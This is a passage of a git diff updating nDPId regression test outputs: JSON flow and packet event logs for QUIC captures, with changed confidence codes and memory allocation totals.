+00943{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1633957625000,"flow_last_seen":1633957625000,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1633957625000,"l3_proto":"ip4","src_ip":"255.255.255.255","dst_ip":"255.255.255.32","src_port":8224,"dst_port":8224,"l4_proto":"udp","flow_datalink":228,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"quic-fuzz-overflow.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":1252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1633957625000} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 
@@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869444 bytes -~~ total memory freed........: 5869444 bytes -~~ total allocations/frees...: 118114/118114 +~~ total memory allocated....: 6003078 bytes +~~ total memory freed........: 6003078 bytes +~~ total allocations/frees...: 120876/120876 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 476 chars ~~ json string max len.......: 3016 chars diff --git a/test/results/quic-mvfst-22.pcap.out b/test/results/quic-mvfst-22.pcap.out index 9d9899bd3..63cf6541a 100644 --- a/test/results/quic-mvfst-22.pcap.out +++ b/test/results/quic-mvfst-22.pcap.out 
@@ -1,10 +1,10 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":24710,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"thread_ts_msec":24710,"pkt":"UlQAEjUCCAAnANMtCABFAATsAABAAEARtN0KAAIPHw1WCIsRAbsE2LapyfrOsAEIVt4FS0mAWdwAAES+glHsK6O\/Oq7IqxunKa1n3XFv8eVEdrO\/buZ2LMAVEB2NyWCg6hfO6EP+vLVLmftkS1PJQqVl7L+7l7BI482Kpj4ofT9JnOQ0xEE4Vys3R4pwXiPc1lMJx32RX9zKYm+Z1fbMOyayi7zU0q+i63OayYrYD3jSt+Vvv7BMyIgMJ2yBRML4Cvl27dkQOy02PKy9hJb4U9IakyZ9jxJvJUG6tfB\/LJZUaX2z8xaFt+J6lEY3AOj1WgBxHOY78xSQcl0cfAaJSIKcA9Vn4sv\/fiPAKil0a5hIx6QXM2jiv4vFSqcgQHPhjbxlmksCUD71+BcElvTx09somsejpTEXOX5DumiTu+RmoxzAPxad\/yoHUmpVtJwSnjk0zwlToGO6SDPnEODnYt3LIvHRsx7mnFExLWnr+yQHfYFCeLNMctGGZBMubCx4gjt048OWguRvM18ud1xw3iRiS5rez8OMJIfcMnRlbnJA4MyOhWSWUbuYwKHXBZjNJSArgDpEssUAVBEOZQpnBVnXDGsqdTXz0eM1y7mnenMoiYqQeMnNMBDyturRKjEAiVgPEzOZ8CufggYEMfnAHCuOwF04gvqplTrrZWKOSNpdQNeFrRsWk7y1RbIKw3b8jWOTzA\/3wnocU7LCIqLpjBDheYw+YKL\/QStNjvcf462QDT2fMTEzd2qFUE5\/HIdvgFCjr11QAYfzSa9caF4orrxStMFBMwLrngiPEoNK2oL1ixSvqcDH1eCryay+ufbCfgtp9mN21cP9bS1fp+KOtJdRjk+WwIrnLE7yFL2kPl4Y1ub8Ic+0DgBOwxUrYa0lSq611ixLqvgBVVHqkVlsmy5FzYlt4nKwAzaE+UMlVSse0y5ciP9QYj7PgUOQsYRJLOdnUB1nb1cLIVzISsr9mEOc4Z\/V5yQfx0Je4KZnrBbnTxqzPJmczioPnEqWI3SSJQvibzfqftopphp69YYIvmngwQ9boqS8nu\/0Z90F4tXrXlEqVlkyt8z345OCJheKM35O3g1+gtDgXes9IlOq0VZHWc1xWYAyu3e5lYps9GawHgztTKd5Dh6phItAr7WJdjC7E5+Hw0Djk+jR2QPNAEyXNvBFWYdDCSKqCL0EW4k8u46MkhLkYoD\/U5LiEaiB5YSuGX8HZDJEwdOPPEWcT2hknjUDiQIy7tuEeBHkZxly3y9r8TtSEnAlDGbBVFAT+DI1sU7ifZHKOelnaNbzJX29JqcLfJH6OdFC035GL8QU1vvk19qbGftY3DBf6EJAhrCyEG8T68nr4mpyNVonkDSzrMh1qFjIZcwFXjgWWM6+wxfrI7EB5HOgW0H2RU+8jBV8bTAp0cYUEIW83AlhSIGJhaN4hzo4QbiQ\/NEKSL4V6HA7r2y3QQu7WQiGeuhWzieHC\/re+NOqmY8UZ2Nbtc52d9K25gQKE7BXNhq2zsjuIhLJme7BBI75RlEqF\/camjLVcquotPgLUp7uXIyomz0zmkrCGiGxy4HlklTCcE1ashYaXZA\/9HX39Pj6qB+WKglzfibh+ldN
WXcB79RaHBC3E7rGwoRJM5jkaMEkWLJVppPuZZUXD0CLZZ5SItvsTmJ1D5A5i3llXNLFE2q4czLsPbe5Ft7r2t0="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05,h1q-fb","ja3":"a3795d067fbf6f44c8657f9e9cbae493","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":24710,"flow_last_seen":24710,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":24710,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"},"quic": {"client_requested_server_name":"graph.facebook.com","version":"TLSv1.3","alpn":"h3-fb-05,h1q-fb","ja3":"a3795d067fbf6f44c8657f9e9cbae493","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft)"}} 
02129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":24717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":24717,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAAYAAEAR9MMfDVYICgACDwG7ixEE7JMhzPrOsAEACEhjA85S+SrVAETSp3xd4I3jcnRue9L34hUuKLzlfpPUk0DMF1\/VFxThZTibHyGTQPaeM6iOotElwwAC1lRX5vIn9ya6YsAZzR1T20xEKAiW3eJkBYrfQ3apmceqTTBCX0bJxPnVeRIzBODDHWoJM4cXlDC\/p3lohjBDIh+3Pmk8tNap58UqGgjHnaigatc5CgFJHJWL+Kd1f9qcpuyZT1uB\/ns\/WT+PLudF\/jQ9707j1mFbnqiURY6nhTe97ZArhq7t1JVJAsO33k150ABBjgVdT\/6wgI8ik0OKmmJMbfb2L+7Ixq0YAACyySDSzQt+wcslS6ksj5zkeJG1dT9Y35jxFQSLUO32yxmbwQFG+b4QvZMRJyJvqfQ7oSMncZe7gs3wgTuaXe5geZfkx17MmRYXTYrf9pvAukh+MM4Q8hjt2gZyy+8MqEokO31Taq32iXjDeFgjn7q\/sQ6rvlxCVyZt8Ccaw1VxzzUAQNXg6QrtjGJsnqKEgZqyevLn4vgbCyEPYSqzUTMTMLMrTP+YLSeAUyD\/0KlFtPE0vwwFCXwILzsVlF8Hrkegr6zVR+h\/fNZFiUKr8jA4htexop3\/TtMjF2PSObMi\/B\/O4yOQK7dMjsb7j6HNoUatgqnfa\/Ep22MPaFjhmHCE5j8WrQYwGpwTuF1k+FX+IBnWV4aUFnYpvfr221AiaeRWseWythbDWPKdPOoQEd\/nzlYGC5Oxk\/91qMZSP6Qi8tEzsAHdyiB9WngqFXo1pqCT6\/T6hHvEqNor+wZ910MK6fQ\/Z\/7idL3\/nnBnU9m8lqNNZM0XegQQnU8+PD\/XZhQjxUwoqqNWAXTx+KKl5uQmMcpN8TieU3aBwrb2x1xcZVNXnjwFxiEsI7kDQg0bAdgGrjrWKUk4cVimEMb0EC3L3V2ZK9Ef+8sswkJ6ekYpwvMTIYU4ZOYeN6c9agkkoqzbCCHeRQql9R0YriJFUFgYENUK5b9nwRNBW+A+lZE8ptuzw5xsFcuyBXpjCKYIgsmKcLlQPkBkV4L5QGZQzzBmN2GgfUAEzN8WWVN0hJqYa9YhcX7zxmRv9gsMitNksaFnr6AlihFLFZqlT9Y648AprztjF7njBZZ3u+CXpZkG7Px2yrrdTouwjAToPn\/AdVmPPTHV6xKp99fDbwaMyfL+yOcnJ2plbK+wkS1jsiP\/yDk9VzA04xL0657ViUEAuv3t4Pev7pI\/DIFdRVSmTSWKvywkuBVJ\/VJOp\/6cO+Cy5FlDhTQR7H8evMXUaEHp69QHfF8fPUAjUyJ7IMeXXtuK3UkzI7UvsOqWVYGkA2OumbWmFRfgS9XBGi3DmR5otgit5Y81MAvHsCQ0V0IB2P\/yq9sRuL6R8TwF63sAvaPwfsPjICjHyZ2krnIlWXUbArKvncQeHm1H6y9ztqgfn+NTwpQWRfi71aj5FP2C+U3RB9l5HqGgyZJ9tt\/Xiom3MonkmdTNfE9C0G+zTKbgAzuir0+laGJim+TV37+wtcreN2P4GKPPo2goOCnc140xbDBLn4BL2axi
e9RcUyuxXK9wAWvijAfXal3f1DydwVZ8LxwK8o06yHcTKFQ\/sXJaHnxv2HTtF\/v0IBQjQRHILVxnhCjAh73MlFUFSG3zJQ2aU164W5cGJFQS3\/OOJsBbuI1J+KjSFQ=="} 02126{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":24717,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":24717,"pkt":"CAAnANMtUlQAEjUCCABFAAUAAAgAAEAR9MEfDVYICgACDwG7ixEE7GUmy\/rOsAEACEhjA85S+SrVAETSuH7quCgS8Qh0D\/bDO3gFDyLADGIuWnyCygbJxoXjp96KXvspho+865YDAISOGlOK6zOTsHDQAebkiFhwjAE3CGShccg0NcaDyS5u33R8Osm0onTcQUcavm+SMZHNxND0mAg59a7z7rYhXIsBKLYSznCIFNmBhvnQ+54HWzq4kDWVLL0ptfvb3giThFXk1AIMtBbaQwMGxHg\/8x0s7Ppw1zOCvbNuFb2SaGK8woqt2broJB\/xJJE2S1FwZCmQqqrE1mHTwDi+8M\/OC1IyVNxKVB8saqcFSbFe3BJEULgEgbvBwmfmNN7Wau\/J6gJxg5w745\/ujGtOLBoEAnkzp3XoTJN0Y42xyNe7RF+e2AS8staHpKBMbgG4b2fukqv0W5QWMOb9XdlK5lappO8kEpmoLvACo9Sy1bI0dfdz52edGlrvLjFy2h3zOMrwDHWDRiYmPSAbJ9pyo+VCqFMWVDhQI4ZmsKudQZcU+vReqpUp36fwM5gOtsh2Hk\/S0k+EHqDAZZLNzSF4Yr5ZabIDN\/R6biJU+FbtoUG+RJBpWcvmHAUftMbmErNWLgTpRpllj3nUl2F8eMASJGjRK8oYFrTV1fl7xjdeBam93XysGVWS92VND4SDvDULI6TRr\/337rNSj3EREqThlcSaMocH0kz+\/upNhJQxDeelV1RY26qv9bW8VdFma6p7uhfRK2roH3G5uc\/+tiG6qdmRct7WQoGsbTeaFFwB7Ji7Wtb9Amekof3OVUrPd+6iV+W3mM4hQL9kRTkFzHEd\/WA\/+8ZmZ+0XzQrpy3WwRvRc4DmvV7nvOYs8y+909LdGLV6CpRLEK1604OVZbyXxVxq8+mD19ElUn1g8QnbzGBFa3Eif7B0cGdFF8WqgYvqe7ufF46ZJs8QD63+SQv8gGxmUo3SJWQ3Yfj1uYEYSEfqi43AQxOFbKmd5oqszRdikvUk0Zh8XMjntw3CR4tWh1lqTR3LIN8Lt7A9gIRX8+3G76YoaDY2JIMjxOuLYIRBVe\/VWBuKPMLqRCv4wvIDach8GKJmbI9PTQ01q1Z5kL\/zM7jTdFAlentpckr6+ua\/D6t6rLd0nkkL8d+15pg8\/FKhrDBHA4Ml4BRHizjz4SpRJ2QEiV\/niWkbX1e0hkpcbZ2xmOFDZW\/9O8RjAOdM08kiCSbKZTUpnl9P0qLKtjystpZa5q8OrBMgSHUgHM1S7geU06smT7+czbBGnnd5A+6PV0mPwqueT\/OUV15fL2NUOxgfqhC8iKqRfJcjzm8CssrkrLVEfaPmw7D7KOm7\/2J64iyqOubriFO6KrbjP+1qKiLmCaqNeEy3JTylMKWsH5UVovtnGGCKeolJjanKSFdzQ0naGenN7GlArcfV78Zclt+QC9mK2mtHkEiO
whoeprg\/zQujUyWH4lxZTrhtEFhlJUvQKpPst4HYEqZgxQPGS5nmr51v1f2cwzcaORxf3cXeVVh\/GKwiwMjI8VaKzhRxAoKZZ3g1TUl61dqF4liU6GnZkX+YBlPJ80vXLVfIDc4zwsjaBUxk1pJO\/LOLCp5buKJ87EbzIoejsqFXfFarTVLwKw\/2KUHEIwDL1x1rU0t6Q+Ap29yyER+brp4OyVHhD6T7u9LrfjXexdQfUgnSNX1Ib4LZ7OO\/KrQ=="} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":24710,"flow_last_seen":139922,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267723,"flow_avg_l4_payload_len":546,"midstream":0,"thread_ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":490,"flow_first_seen":24710,"flow_last_seen":139922,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":267723,"flow_avg_l4_payload_len":546,"midstream":0,"thread_ts_msec":139922,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"31.13.86.8","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Facebook","breed":"Fun","category":"SocialNetwork"}} 
00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":490,"source":"quic-mvfst-22.pcap","alias":"nDPId-test","packets-captured":490,"packets-processed":490,"total-skipped-flows":0,"total-l4-payload-len":267723,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":139922} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 490/490 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5893774 bytes -~~ total memory freed........: 5893774 bytes -~~ total allocations/frees...: 118625/118625 +~~ total memory allocated....: 6027408 bytes +~~ total memory freed........: 6027408 bytes +~~ total allocations/frees...: 121387/121387 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2134 chars diff --git a/test/results/quic-mvfst-22_decryption_error.pcap.out b/test/results/quic-mvfst-22_decryption_error.pcap.out index c3ada5808..703f4674c 100644 --- a/test/results/quic-mvfst-22_decryption_error.pcap.out +++ b/test/results/quic-mvfst-22_decryption_error.pcap.out 
@@ -2,10 +2,10 @@ 00570{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593498296832} 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
02105{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593498296832,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":1260,"pkt_l4_len":1240,"thread_ts_msec":1593498296832,"pkt":"RTgE7B0GAABAEeVBCuYoqF5h4ZLy9AG7BNgTGcP6zrABCEACR1YBz3h7AABEvkgDSkdXT8KDRtZ6SuR9aklyes\/l4Sioa5nXAcPGveAb5Mb0k7uBERsrnzBa9uno+scwKQJ+8HaE7SwNRWaJ0B+VYq5sgzaHE9BksItfZB05b19PkWz3XaOJPeabOxbegkEde\/7BgQc2iMQiMZifq3YQkFbpelKpfZ8UxZbKFKO8T8enNpDFvm79StOLsc58r6VUI7R7RX2Dh+7UvHc8w55LVS4nFdKyvt+gLMAzuTrAqSRX04ucEX43SZLKcpJ+X+iK\/v9u1yLmGT\/8hHS\/A3VBUuWVRkAqUr3zRxflhV5CjsXky9idxKWm4C9Pn6cw4624LuYteYIUWOTHQHv3zV5\/rnXQxed5aHO337llijw0yLFxpnpOUEtoxTKtZZeNyR3\/hCIkY3n14k3gHfYXZl5t7DMoJYBnIHHhmdFCOK4sdCcKtpOlPKhDiv0BdCMImPxwr5CZ3d0NvKvNFKbylEYXGyw6diXHrADpP1Bpo7IsDo6OECekYHLzamw7fo5GRjTg4wyZ585sRHNOY5UQ14urjp6qTgyJaK+bJQKQXSG\/jPsJRoA3bT9RYwhd92VXr\/SRpMsMI1dgiAabVuN6aapjwqQ05GcX1xWXUOswELHBWeda+RZSG0ealfCxTmgk\/LmTIARNNTXtxke0sf\/IlfnV3ikcr9NqDIrI6of1G3cZfUQGBWE6gBVL5hH\/8pDG4T4ZpNiYz4Y0kEK9VRD1GZ0w6BCqlt\/kg2zd6ahgaI4n0T7BllqMO01YZ1t9pyXJShYy7a1\/GE3TCKsHNgIVU+OzGaBubO2O8foCsTRqluuqUPhG3n2E8MHmbHfrbqadkpRwbm5mHSUiRHvHPOMZ3uD3xF6j764aqPOQrl01dj1iQP+qGIcEY5l4ogPeALtV3hU5f7bpvLSDPKVoHsWvz++bxVzr7sgAnGREUzsxKt4SUYuRzz53icFmvd9rxNmgOaF+PEw\/dQIcNJqpxX8ulzLr4tUIjHsZy8Y3w0WHWlRvXX5BFt\/FNL6D1z9p+LMmNXuSPqVvh56LVqzeEf7uD4SQyYHHodFZUSZh4UJZfGLFC0eeFNy2qBWMNwCptrLdwN5PCZlQ07ewM1OmYFXib\/9zYOSk4B0N24Ml1I3V+BUt9Q\/f7In0Lo1bYVhzoFFJnm1wIhEDEaXvsKWXwZTHPIpl1Hz1I\/6Yq3hsX1N3dtM00S1An2mdoc9+06efV9TeSDkQwX8r+ZabNOKTRtHqXDe1Wl+aE\/ZahNHsuY3HnDuGINcHsBCTv1ovOmoDAi0RUdYM0lPaGHSMu61RpKW5cRQ0Cdy0+WZXfm0NBcMkEOs1K83zDl3Ni0ybs6vWiqa45kxw7H1vC362nLorQvhZdy7wTrE4RWiFGT0Xccp4Rl8QprALjpWqFcS7MPnifCUJZzLuwLuogz6ePAO7YscFlIza4b2sSjihSJrD9QLuOyhifjzSEn4amVk5ivqXVE+QZ1R7NVlYJU0wlh1SwakKVblsHRVpjkjVrp5to9V854c
ET1W0se7gIi2a7oXoLvW8CT8NdthxNrd\/AUaazo7KSGS96THBAG+HmraPSIMT5EEnSDc\/KXc1EWvMFe0xKOugeQC4v6tFGa5dLsgNI0TE"} -00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} +00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593498296832,"flow_last_seen":1593498296832,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1593498296832,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}} 
00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593498296833,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} 00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593498296833,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":106,"pkt_l4_len":86,"thread_ts_msec":1593498296833,"pkt":"RQAAapbBAABAEXBACuYoqF5h4ZLy9AG7AFbkKub6zrABCEACR1YBz3h7AD4ztLOg+8\/NWUDesKp0sDyq9wl\/qnK\/iaP4qknLwsMfEkvd24lrwL0JnOo2eK80vHLhCKIp2AiTqDI94jB8\/Q=="} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1593498296832,"flow_last_seen":1593498297036,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":390606,"flow_avg_l4_payload_len":1106,"midstream":0,"thread_ts_msec":1593498297036,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 
+00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":353,"flow_first_seen":1593498296832,"flow_last_seen":1593498297036,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":390606,"flow_avg_l4_payload_len":1106,"midstream":0,"thread_ts_msec":1593498297036,"l3_proto":"ip4","src_ip":"10.230.40.168","dst_ip":"94.97.225.146","src_port":62196,"dst_port":443,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00583{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":353,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","packets-captured":353,"packets-processed":353,"total-skipped-flows":0,"total-l4-payload-len":390606,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593498297036} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 353/353 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5889760 bytes -~~ total memory freed........: 5889760 bytes -~~ total allocations/frees...: 118486/118486 +~~ total memory allocated....: 6023394 